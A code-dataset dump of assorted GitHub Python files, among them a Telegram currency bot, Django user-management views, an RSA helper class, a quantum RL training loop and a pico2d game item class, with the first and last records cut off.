pxs=self.Ps2Pix(ps)\n return self.Image_Draw_Polyline(pxs,classs,color,parms,close)\n\n \n def Draw_Arc(self,pc,r,ang1,ang2,color,width=1,npoints=100):\n pxs=self.P2Pix([ pc[0]+r*cos(ang1) , pc[1]+r*sin(ang1) ])\n \n dang=(ang2-ang1)/(1.0*(npoints-1))\n ang=ang1\n \n for i in range(npoints):\n px=self.P2Pix([ pc[0]+r*cos(ang) , pc[1]+r*sin(ang) ])\n pxs.append( px )\n\n ang+=dang\n\n classs=\"Arc\"\n return self.Image_Draw_Polyline(pxs,classs,color)\n \n #Remove width parameter\n \n def Draw_Arc_Span(self,pc,v,ang,classs,color,npoints=100):\n \n dang=ang/(1.0*(npoints-1))\n ang=0.0\n\n pxs=[]\n for i in range(npoints):\n p=pc+v.Rotate2(ang)\n px=self.P2Pix(p)\n pxs.append(px)\n \n ang+=dang\n \n return self.Image_Draw_Polyline(pxs,classs,color)\n \n \n def Draw_Circle_Span(self,pc,v,ang1,ang2,classs,color,npoints=100):\n \n dang=(ang2-ang1)/(1.0*(npoints-1))\n rang=ang1\n\n pxs=[]\n for i in range(npoints):\n p=pc+v.Rotate2(rang)\n px=self.P2Pix(p)\n \n pxs.append(px)\n rang+=dang\n\n return self.Image_Draw_Polyline(pxs,classs,color)\n\n \n def Draw_Circle_Span_External(self,pc,v,angle,classs,color,npoints=100):\n angle2=-2.0*pi\n if (angle>0.0):\n angle2=2.0*pi\n \n return self.Draw_Circle_Span(pc,v,angle,angle2,classs,color,npoints)\n \n def Draw_Circle_Span_Internal(self,pc,v,angle,classs,color,npoints=100):\n return self.Draw_Circle_Span(pc,v,0.0,angle,classs,color,npoints)\n \n \n def Draw_Circle_Spans(self,pc,v,angle,classs,invclasss,color,invcolor,npoints=100):\n if (angle<0.0):\n tmp=classs\n classs=invclasss\n invclasss=tmp\n \n tmp=color\n color=invcolor\n invcolor=tmp\n \n svg=self.Draw_Circle_Span_External(pc,v,angle,classs,color,npoints)\n return svg+self.Draw_Circle_Span_Internal(pc,v,angle,invclasss,invcolor,npoints)\n \n \n \n \n","repo_name":"olesmith/SmtC","sub_path":"Canvas2/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"40464396070","text":"import telebot\nfrom config import TOKEN, currency\nfrom extensions import APIException, Convertor\nimport traceback\nbot = telebot.TeleBot(TOKEN)\n\n@bot.message_handler(commands=['start'])\ndef help(message: telebot.types.Message):\n text = \"Привееет, рад видеть 🤗! Чо как оно в целом?\\n Я обладаю очень полезным, в наше безумное время, навыком 😎 \\\n Я умею рассчитывать стоимость иностранных валют! \\\nКак это сделать я объясню тут: /help \\n \\\nТыкай сюда, что бы увидеть список валют: /values\"\n\n\n bot.reply_to(message, text)\n\n@bot.message_handler(commands=['help'])\ndef help(message: telebot.types.Message):\n text = \"Я умею Конвертировать валюты! Круто да? Для этого тебе надо ввести \\n \\\n<имя валюты, цену которой ты хочешь узнать, в именительном падеже> \\n\\\n<имя валюты, в которой надо узнать цену первой валюты, тоже в именительном падеже> \\n\\\n<количество первой валюты>\\n \\\nИ я тебе разъясню почём фунт лиха 😃 \\n \\\nТыкай сюда что бы увидеть список валют: /values\"\n\n bot.reply_to(message, text)\n\n@bot.message_handler(commands=['values'])\ndef values(message: telebot.types.Message):\n text = 'Имеем дело с:'\n for key in currency.keys():\n text = '\\n'.join((text, key, ))\n bot.reply_to(message, text)\n\n\n@bot.message_handler(content_types=['text'])\ndef converter(message: telebot.types.Message):\n values = message.text.split()\n try:\n if len(values) != 3:\n raise APIException('Уоу! должно быть задано три параметра 🥴 /help')\n\n answer = Convertor.get_price(*values)\n except APIException as e:\n bot.reply_to(message, f\"Какая-то ошибка в команде 🤔 :\\n{e}\")\n except Exception as e:\n traceback.print_tb(e.__traceback__)\n bot.reply_to(message, f\"А это, друг мой, неизвестная ошибка 😳 :\\n{e}\")\n else:\n bot.reply_to(message, answer)\n\nAPIException\n\nConvertor\n\nbot.polling()\n","repo_name":"Stanley5051/Skillfactory-task-c5.6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"22030794558","text":"import logging\nimport os\nimport sys\nimport time\nfrom functools import reduce\n\nimport numpy as np\nimport tensorflow as tf\nfrom misc.utils import compute_returns, create_exp_dir, gather_episodes\nfrom models.quantum_models import generate_model_policy as Network\nfrom search import quantum_encoding\n\n\ndef main(bit_string, qubits, n_actions, observables, n_episodes = 1000, batch_size = 10, gamma = 1, beta = 1.0,\n state_bounds = np.array([2.4, 2.5, 0.21, 2.5]), env_name = \"CartPole-v1\", save='quantum', expr_root='search',\n lr_in = 0.1, lr_var = 0.01, lr_out = 0.1, backend = 'cirq'):\n \"\"\"\n Main training process in multi-objective search.\n \"\"\"\n save_pth = os.path.join(expr_root, '{}'.format(save))\n create_exp_dir(save_pth)\n log_format = '%(asctime)s %(message)s'\n logging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\n fh = logging.FileHandler(os.path.join(save_pth, 'log.txt'))\n fh.setFormatter(logging.Formatter(log_format))\n logging.getLogger().addHandler(fh)\n\n nb, genotype = quantum_encoding.convert2arch(bit_string)\n model = Network(qubits, genotype, n_actions, beta, observables, env_name)\n \n logging.info(\"Genome = %s\", nb)\n logging.info(\"Architecture = %s\", genotype)\n\n optimizer_in = tf.keras.optimizers.Adam(learning_rate=lr_in, amsgrad=True)\n optimizer_var = tf.keras.optimizers.Adam(learning_rate=lr_var, amsgrad=True)\n optimizer_out = tf.keras.optimizers.Adam(learning_rate=lr_out, amsgrad=True)\n\n # Assign the model parameters to each optimizer\n w_in, w_var, w_out = 1, 0, 2\n\n @tf.function\n def reinforce_update(states, actions, returns, model):\n states = tf.convert_to_tensor(states)\n actions = tf.convert_to_tensor(actions)\n returns = tf.convert_to_tensor(returns)\n\n with tf.GradientTape() as tape:\n tape.watch(model.trainable_variables)\n logits = model(states)\n p_actions = tf.gather_nd(logits, actions)\n log_probs = tf.math.log(p_actions)\n loss = tf.math.reduce_sum(-log_probs * returns) / batch_size\n grads = tape.gradient(loss, model.trainable_variables)\n for optimizer, w in zip([optimizer_in, optimizer_var, optimizer_out], [w_in, w_var, w_out]):\n optimizer.apply_gradients([(grads[w], model.trainable_variables[w])])\n\n # Start training the agent\n episode_reward_history = []\n for batch in range(n_episodes // batch_size):\n # Gather episodes\n _, episodes = gather_episodes(state_bounds, n_actions, model, batch_size, env_name, beta, backend)\n\n # Group states, actions and returns in numpy arrays\n states = np.concatenate([ep['states'] for ep in episodes])\n actions = np.concatenate([ep['actions'] for ep in episodes])\n rewards = [ep['rewards'] for ep in episodes]\n returns = np.concatenate([compute_returns(ep_rwds, gamma) for ep_rwds in rewards])\n returns = np.array(returns, dtype=np.float32)\n\n id_action_pairs = np.array([[i, a] for i, a in enumerate(actions)])\n\n # Update model parameters.\n reinforce_update(states, id_action_pairs, returns, model)\n\n # Store collected rewards\n for ep_rwds in rewards:\n episode_reward_history.append(np.sum(ep_rwds))\n\n avg_rewards = np.mean(episode_reward_history[-10:])\n\n logging.info('Finished episode: %f', (batch + 1) * batch_size)\n logging.info('Average rewards: %f', avg_rewards)\n \n if avg_rewards >= 500.0 and env_name == \"CartPole-v1\":\n break\n elif avg_rewards >= -110 and env_name == \"MountainCar-v0\":\n break\n return episode_reward_history\n","repo_name":"ScQ-Cloud/pyquafu","sub_path":"examples/quantum_rl/search/quantum_train_search.py","file_name":"quantum_train_search.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"45"} +{"seq_id":"27304507133","text":"import json\nfrom django.test.testcases import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import SimpleTestCase\nfrom fakecouch import FakeCouchDb\n\nfrom corehq.apps.accounting.models import SoftwarePlanEdition\nfrom corehq.apps.accounting.tests.utils import DomainSubscriptionMixin\nfrom corehq.apps.accounting.utils import clear_plan_version_cache\nfrom corehq.apps.users.models import WebUser\n\nfrom corehq.apps.domain.models import Domain\nfrom corehq.apps.userreports.expressions.factory import ExpressionFactory\nfrom corehq.apps.userreports.filters.factory import FilterFactory\nfrom corehq.apps.userreports.models import DataSourceConfiguration\nfrom corehq.apps.userreports.specs import FactoryContext\nfrom corehq.apps.users.models import CommCareUser\nimport os\n\n\nclass ChampTestCase(TestCase, DomainSubscriptionMixin):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.factory = RequestFactory()\n # gets created + removed in package level setup / teardown\n domain = Domain.get_or_create_with_name('champ-cameroon')\n domain.is_active = True\n domain.save()\n cls.domain = domain\n cls.setup_subscription(cls.domain.name, SoftwarePlanEdition.ADVANCED)\n cls.user = WebUser.create(domain.name, 'test', 'passwordtest', None, None)\n cls.user.is_authenticated = True\n cls.user.is_superuser = True\n cls.user.is_authenticated = True\n cls.user.is_active = True\n\n @classmethod\n def tearDownClass(cls):\n cls.teardown_subscriptions()\n cls.user.delete(cls.domain.name, deleted_by=None)\n clear_plan_version_cache()\n super().tearDownClass()\n\n @classmethod\n def add_request_attrs(cls, request):\n request.user = cls.user\n request.domain = cls.domain.name\n\n\nclass TestDataSourceExpressions(SimpleTestCase):\n\n data_source_name = None\n\n def get_expression(self, column_id, column_type):\n column = self.get_column(column_id)\n if column['type'] == 'boolean':\n return FilterFactory.from_spec(\n column['filter'],\n FactoryContext(self.named_expressions, {})\n )\n else:\n self.assertEqual(column['datatype'], column_type)\n return ExpressionFactory.from_spec(\n column['expression'],\n FactoryContext(self.named_expressions, {})\n )\n\n @classmethod\n def setUpClass(cls):\n super(TestDataSourceExpressions, cls).setUpClass()\n\n data_source_file = os.path.join(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)),\n 'ucr_data_sources',\n cls.data_source_name\n )\n\n with open(data_source_file, encoding='utf-8') as f:\n cls.data_source = DataSourceConfiguration.wrap(json.loads(f.read())['config'])\n cls.named_expressions = cls.data_source.named_expression_objects\n\n def setUp(self):\n self.database = FakeCouchDb()\n self.user_orig_db = CommCareUser.get_db()\n CommCareUser.set_db(self.database)\n\n def tearDown(self):\n CommCareUser.set_db(self.user_orig_db)\n\n def get_column(self, column_id):\n return [\n ind\n for ind in self.data_source.configured_indicators\n if ind['column_id'] == column_id\n ][0]\n","repo_name":"dimagi/commcare-hq","sub_path":"custom/champ/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"42710613325","text":"\"\"\"empty message\n\nRevision ID: 1c6735c6ed2a\nRevises: 028d27d5e5d0\nCreate Date: 2020-07-09 15:16:40.252769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"1c6735c6ed2a\"\ndown_revision = \"028d27d5e5d0\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"users\", sa.Column(\"auto_refresh\", sa.Boolean(), nullable=True))\n op.add_column(\"users\", sa.Column(\"push_enabled\", sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"users\", \"push_enabled\")\n op.drop_column(\"users\", \"auto_refresh\")\n # ### end Alembic commands ###\n","repo_name":"sendahug/send-hug-backend","sub_path":"migrations/versions/20200709_1516_1c6735c6ed2a_.py","file_name":"20200709_1516_1c6735c6ed2a_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29639553558","text":"from cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.exceptions import InvalidSignature\n\n\nclass CryptographyHandler:\n def __init__(self, private_key_path: str, public_key_path: str):\n private_key_pem = self._get_pem_from_file(private_key_path)\n public_key_pem = self._get_pem_from_file(public_key_path)\n self._private_key = load_pem_private_key(data=private_key_pem, password=None, backend=default_backend())\n self._public_key = load_pem_public_key(public_key_pem, default_backend())\n\n def _get_pem_from_file(self, path: str) -> bytes:\n with open(path, 'rb') as pem_file:\n return pem_file.read()\n\n def check_signature(self, signature: bytearray, signed_data: bytearray) -> bool:\n try:\n self._public_key.verify(bytes(signature),\n bytes(signed_data),\n padding.PSS(padding.MGF1(hashes.SHA256()), 0), # Padding length?\n hashes.SHA256()\n )\n except InvalidSignature:\n return False\n else:\n return True\n\n def create_signature(self, data_to_sign: bytearray) -> bytearray:\n return self._private_key.sign(bytes(data_to_sign),\n padding.PSS(padding.MGF1(hashes.SHA256()), 0), # Padding length?\n hashes.SHA256()\n )\n\n def encrypt_data(self, data: bytearray) -> bytearray:\n encrypted_data = bytearray()\n while True:\n if len(data) - 150 > 0:\n bytes_data = self._public_key.encrypt(bytes(data[:150]), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n encrypted_data.extend(bytes_data)\n data = data[150:]\n else:\n bytes_data = self._public_key.encrypt(bytes(data), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n encrypted_data.extend(bytes_data)\n break\n return encrypted_data\n\n def decrypt_data(self, data: bytearray) -> bytearray:\n decrypted_data = bytearray()\n while True:\n if len(data) - 256 > 0:\n bytes_data = self._private_key.decrypt(bytes(data[:256]), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n decrypted_data.extend(bytes_data)\n data = data[256:]\n else:\n bytes_data = self._private_key.decrypt(bytes(data), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n decrypted_data.extend(bytes_data)\n break\n return decrypted_data\n","repo_name":"rafallewanczyk/TIN","sub_path":"temperature_regulator/test/cryptography_handler.py","file_name":"cryptography_handler.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41247904390","text":"from itertools import permutations \n\nstring = input()\nstring = sorted(string)\nfinal = \"\"\nfor element in string:\n\tfinal += element\ns = set([''.join(p) for p in permutations(final)])\nprint(len(s))\nfor e in s:\n\tprint(e)","repo_name":"shreyas-selvaraj/cses_problems","sub_path":"creating_strings_1.py","file_name":"creating_strings_1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73774335815","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin,UserPassesTestMixin,PermissionRequiredMixin\nfrom django.contrib.auth.views import PasswordChangeView, PasswordResetView,LoginView\nfrom django.contrib.auth import login as auth_login\nfrom django.views.generic import CreateView,ListView,DetailView,UpdateView,DeleteView,FormView\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom django.urls import reverse_lazy\nfrom django.core.files.storage import FileSystemStorage\nfrom itertools import groupby\nfrom operator import attrgetter\n\nfrom .models import *\nfrom .forms import *\n\n\n#region---------------------------------------------------------------------------------------USUARIOS\nfrom django.http import JsonResponse\n\ndef set_dark_mode(request):\n if request.method == 'POST':\n dark_mode = request.POST.get('dark_mode')\n user = request.user\n if user.usuarios.darkmode:\n user.usuarios.darkmode=False\n else:\n user.usuarios.darkmode=True\n user.usuarios.save()\n return JsonResponse({'status': 'ok'})\n \n \nclass UsuariosLoginView(LoginView):\n template_name='login.html'\n\n def form_valid(self, form):\n \"\"\"\n Security check complete. Log the user in.\n Según el rol redirecciona a determinada pagina.\n Por default es Inicio. \n \"\"\"\n user=form.get_user()\n auth_login(self.request, user)\n permisos= user.get_all_permissions()\n return redirect('index')\n\n\nclass UsuariosListView(PermissionRequiredMixin, ListView ): \n permission_required = ('auth.view_user') \n model = Usuarios\n\n #Funcion de busqueda\n def get_queryset(self):\n query = self.request.GET.get('busqueda')\n if query:\n object_list = self.model.objects.filter(\n Q(usuario__username__icontains=query) |\n Q(usuario__first_name__icontains=query) |\n Q(usuario__last_name__icontains=query) |\n Q(usuario__email__icontains=query) |\n Q(telefono__icontains=query)\n ).distinct()\n else:\n object_list = self.model.objects.all().exclude(usuario_id__is_superuser =True)\n return object_list\n \n \nclass UsuariosDetailView(UserPassesTestMixin,DetailView):\n model = Usuarios\n template_name = 'Usuarios/usuarios_detail.html'\n\n def test_func(self):\n # accede a la vista de detalle si es admin o si es el mismo usuario\n if self.request.user.is_authenticated:\n usuario_actual = self.request.user.usuarios.id\n usuario_solicitado= int(self.kwargs['pk'])\n if (usuario_actual == usuario_solicitado) or self.request.user.has_perm('auth..base_admin') or self.request.user.has_perm('auth_user.view_user'):\n return True\n else:\n return False \n\n def get_permission_name_traduce(self, codename):\n '''\n Función para traducir los nombres de los permisos\n '''\n if codename.startswith('add_'):\n return f\"Agregar {codename[4:]}\"\n elif codename.startswith('delete_'):\n return f\"Borrar {codename[7:]}\"\n elif codename.startswith('change_'):\n return f\"Modificar {codename[7:]}\"\n elif codename.startswith('view_'):\n return f\"Visualizar {codename[5:]}\"\n else:\n return codename\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n \n usuario = context['object']\n grupos = usuario.usuario.groups.all() \n \n permisos_por_modulo = {}\n for grupo in grupos:\n for permiso in grupo.permissions.all():\n app_label, codename = permiso.content_type.app_label, permiso.codename\n if app_label not in permisos_por_modulo:\n permisos_por_modulo[app_label] = []\n permisos_por_modulo[app_label].append(self.get_permission_name_traduce(codename))\n \n context['permisos_por_modulo'] = permisos_por_modulo\n \n return context\n\n\nclass UsuariosDeleteView(PermissionRequiredMixin,SuccessMessageMixin,DeleteView): \n permission_required = ('auth.delete_user') \n model = Usuarios\n template_name = 'Usuarios/usuarios_confirm_delete.html'\n success_url= reverse_lazy(\"usuarios_listar\")\n success_message = \"El registro fue eliminado correctamente\" \n\n \nclass UsuariosCreateView(PermissionRequiredMixin,SuccessMessageMixin,FormView): \n permission_required = ('auth.add_user') \n template_name = 'Usuarios/usuarios_create_form.html'\n form_class = UsuariosCreateForm \n \n def form_valid(self, form): \n dni = form.cleaned_data['dni'] \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Usuario creado con éxito.'))\n return redirect('usuarios_ver',user.usuarios.id)\n else:\n messages.error(self.request, ('No fue posible crear el usuario.'))\n return redirect('usuarios_listar')\n\n\nclass UsuariosUpdateView(PermissionRequiredMixin,SuccessMessageMixin,UpdateView):\n permission_required = ('auth.change_user') \n model = User\n form_class = UsuariosUpdateForm \n template_name = 'Usuarios/usuarios_update_form.html'\n\n def form_valid(self, form): \n dni = form.cleaned_data['dni'] \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Usuario modificado con éxito.'))\n else:\n messages.error(self.request, ('No fue posible modificar el usuario.'))\n return redirect('usuarios_ver', pk=user.usuarios.id)\n\n#endregion------------------------------------------------------------------------------------------\n\n\n#region---------------------------------------------------------------------------------------PASSWORDS\n\nclass UsuariosResetPassView(PermissionRequiredMixin,SuccessMessageMixin,PasswordResetView):\n '''\n Permite al usuario staff resetear la clave a otros usuarios del sistema mediante el envío de un token por mail. \n IMPORTANTE: el mail al que se envía el token de recupero debe coincidir con el mail que el usuario tiene \n almacenado en su perfil, por lo cual es imprescindible chequear que sea correcto.\n\n De la documentación de Django: \n Given an email, return matching user(s) who should receive a reset.\n This allows subclasses to more easily customize the default policies\n that prevent inactive users and users with unusable passwords from\n resetting their password.\n '''\n permission_required = ('auth.change_user') \n template_name='Passwords/password_reset.html'\n form_class = MyResetPasswordForm\n success_url = reverse_lazy('usuarios_listar')\n success_message = \"Mail de reseteo de contraseña enviado con éxito.\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user_id =self.kwargs['pk']\n user = User.objects.get(id=user_id)\n email=user.email\n context.update(\n {\n \"email\": email, \n \"usuario\": user, \n }\n )\n return context\n\n def get_form_kwargs(self):\n \"\"\"Devuelve los argumentos de palabras (kwargs) clave para instanciar el formulario.\"\"\"\n user_id =self.kwargs['pk']\n user = User.objects.get(id=user_id)\n email=user.email\n kwargs = {\n \"initial\": {'email': email},\n \"prefix\": self.get_prefix(),\n }\n if self.request.method in (\"POST\", \"PUT\"):\n kwargs.update(\n {\n \"data\": self.request.POST,\n \"files\": self.request.FILES,\n }\n )\n return kwargs\n\n#endregion\n\n\n#region---------------------------------------------------------------------------------------PERFILES DE USUARIOS \n\nclass PerfilUpdateView(UserPassesTestMixin,SuccessMessageMixin,UpdateView):\n '''\n Vista para que los usuarios logueados (no staff) realicen cambios en sus datos de perfil.\n De la tabla USER: Nombre de usuario, Nombre, Apellido o email.\n De la tabla USUARIOS(extensión del modelo USER): telefono.\n '''\n model = User\n form_class = PerfilUpdateForm \n template_name = 'Perfiles/perfil_update_form.html'\n success_message = \"Perfil editado con éxito.\" \n\n def test_func(self):\n # accede a la vista si es el mismo usuario\n if self.request.user.is_authenticated:\n usuario_actual = self.request.user.id\n usuario_solicitado= int(self.kwargs['pk'])\n if (usuario_actual == usuario_solicitado):\n return True\n else:\n return False \n\n def form_valid(self, form): \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n dni = form.cleaned_data['dni'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Perfil modificado con éxito.'))\n else:\n messages.error(self.request, ('No fue posible modificar el perfil.')) \n return redirect('usuarios_ver', pk=user.usuarios.id)\n \nclass PerfilChangePassView(LoginRequiredMixin,SuccessMessageMixin,PasswordChangeView):\n '''\n Vista para que los usuarios logueados (no staff) realicen cambios de clave. \n Es requisito conocer su clave anterior e introducir una nueva contraseña que cumpla con los requisitos del sistema.\n '''\n template_name='Perfiles/perfil_change_password.html'\n form_class = MyPasswordChangeForm\n success_url = reverse_lazy('index')\n success_message = \"La contraseña fue modificada con éxito.\" \n\n#endregion\n\n","repo_name":"PabloCao1/CRM_ProComuna2","sub_path":"Usuarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21274379851","text":"\"\"\"\n115. Unique Paths II\nFollow up for \"Unique Paths\":\n\nNow consider if some obstacles are added to the grids. How many unique paths would there be?\n\nAn obstacle and empty space is marked as 1 and 0 respectively in the grid.\n\nExample\nExample 1:\n\tInput: [[0]]\n\tOutput: 1\n\n\nExample 2:\n\tInput: [[0,0,0],[0,1,0],[0,0,0]]\n\tOutput: 2\n\n\tExplanation:\n\tOnly 2 different path.\n\n\nNotice\nm and n will be at most 100.\n\"\"\"\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid):\n if not obstacleGrid or not obstacleGrid[0] or obstacleGrid[0][0] == 1:\n return 0\n m, n = len(obstacleGrid), len(obstacleGrid[0])\n if obstacleGrid[m - 1][n - 1] == 1:\n return 0\n for i in range(m):\n for j in range(n):\n if obstacleGrid[i][j] == 1:\n obstacleGrid[i][j] = 0\n elif i == 0 and j == 0:\n obstacleGrid[i][j] = 1\n else:\n obstacleGrid[i][j] = (obstacleGrid[i - 1][j] if i - 1 >= 0 else 0) + (obstacleGrid[i][j - 1] if j - 1 >= 0 else 0)\n return obstacleGrid[m - 1][n - 1]\n\n\nprint(Solution().uniquePathsWithObstacles([[0,0],[0,0],[0,0],[1,0],[0,0]]))\n","repo_name":"pansinyoung/python-lint","sub_path":"115_Unique_Paths_II.py","file_name":"115_Unique_Paths_II.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37271306783","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndf = pd.read_csv(\n \"../data/realization_path_gen_logistic_SDE.csv\", sep=',',\n header=1,\n names=[\n \"i\",\n \"t_i\", \"x_milstein(t_i)\"\n ]\n)\npath_line_plot = sns.lineplot(\n data=df,\n x=\"t_i\",\n y=\"x_milstein(t_i)\"\n)\npath_line_plot.axhline(\n y=1.0,\n color='r',\n ls='--',\n label='Carrying capacity'\n)\nplt.show()\n","repo_name":"SaulDiazInfante/EM-infererence-gen-log-sde","sub_path":"visualization/realization_path.py","file_name":"realization_path.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32023001033","text":"from pico2d import *\nimport logo_state\nimport random\nimport game_framework\nimport game_world\nfrom player import Player\n\nclass Item:\n SPEED = 200\n BOTTOM = 150\n ANIMATION_TOP = 200\n def __init__(self, level):\n self.image = logo_state.item_box\n self.x, self.y = 0, 575\n self.speed = 1 + random.random()\n self.setting = False\n self.item_kind = random.randint(0, level + 1)\n while logo_state.key_check == 2 and self.item_kind == 0:\n self.item_kind = random.randint(0, level + 1)\n while (logo_state.is_not_protect == 2 or logo_state.is_not_protect == 3)and self.item_kind == 3:\n self.item_kind = random.randint(0, level + 1)\n self.progress_image = logo_state.progress_bar\n self.progress_index = 9\n self.press_time = 0.0\n self.level = level\n self.animation_index = 0\n self.life_get = False\n self.key_get = False\n self.is_press = False\n self.power_frame = 0\n self.time = 0\n self.size = 75\n print(self.item_kind)\n\n def item_down_animation(self):\n if self.y > Item.BOTTOM:\n self.y += -1 * game_framework.frame_time * self.speed * Item.SPEED\n if self.y <= Item.BOTTOM:\n self.y = Item.BOTTOM\n self.setting = True\n\n def item_get_animation(self):\n if self.y < Item.ANIMATION_TOP:\n self.y += game_framework.frame_time * self.speed * Item.SPEED\n if self.y >= Item.ANIMATION_TOP:\n if self.item_kind == 0:\n self.x, self.y = 100, 40\n self.key_get = True\n elif self.item_kind == 1:\n self.life_get = True\n self.animation_index += 1\n\n def item_goto_sky(self):\n if self.y < 575:\n self.y += game_framework.frame_time * self.speed * Item.SPEED\n if self.y >= 575:\n game_world.remove_object(self)\n\n def item_power_up_animation(self):\n self.time += game_framework.frame_time\n self.power_frame = round(self.time) % 5\n if self.time > 1 and self.power_frame == 0:\n logo_state.is_not_protect = 1\n logo_state.power_sound.set_volume(32)\n logo_state.power_sound.play()\n game_world.remove_object(self)\n\n def update(self):\n if self.animation_index == 0: Item.item_down_animation(self)\n elif self.animation_index == 1: Item.item_get_animation(self)\n elif self.animation_index == 2 and self.item_kind == 3:\n self.x, self.y = 170, 40\n Item.item_power_up_animation(self)\n elif self.animation_index == 2 and (self.item_kind != 0 and self.item_kind != 1): Item.item_goto_sky(self)\n\n if self.setting:\n self.progress_index = round(self.press_time * 20)\n if self.progress_index > 9:\n logo_state.effect_sound.set_volume(32)\n logo_state.effect_sound.play()\n if self.item_kind == 0: self.image = logo_state.key_image\n elif self.item_kind == 1:\n if self.level == 1: self.image = logo_state.red\n elif self.level == 2: self.image = logo_state.pink\n elif self.level == 3: self.image = logo_state.black\n elif self.level == 4: self.image = logo_state.yellow\n elif self.level == 5: self.image = logo_state.blue\n elif self.item_kind == 3:\n self.image = logo_state.power_up\n self.size = 50\n logo_state.is_not_protect = 2\n else:\n self.image = logo_state.npc_image1\n\n self.animation_index += 1\n self.setting = False\n\n if self.is_press:\n self.press_time += game_framework.frame_time\n\n def draw(self):\n self.image.clip_draw(self.power_frame * self.size, 0, self.size, self.size, self.x, self.y)\n #else:\n #self.image.draw(self.x, self.y)\n if self.setting:\n self.progress_image.clip_draw(0, self.progress_index * 50, 100, 50, self.x, self.y + 50)\n\n def draw_bb(self):\n draw_rectangle(*self.get_bb())\n\n def get_bb(self):\n return self.x - 35, self.y - 35, self.x + 35, self.y + 35\n\n def collide(self, a, b, state, num):\n left_a, bottom_a, right_a, top_a = a.get_bb(state, num)\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if state == 2 or state == 3: return False\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n return True","repo_name":"mwon0326/2D-GamePrograming","sub_path":"term/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25865722927","text":"a=input()\nf=0\nl=len(a)-1\nwhile f<=l:\n for i in range(len(a)):\n if i==f or i==l:\n print(a[i],end=\"\")\n else:\n print(\" \",end=\"\")\n print(\"\\r\")\n 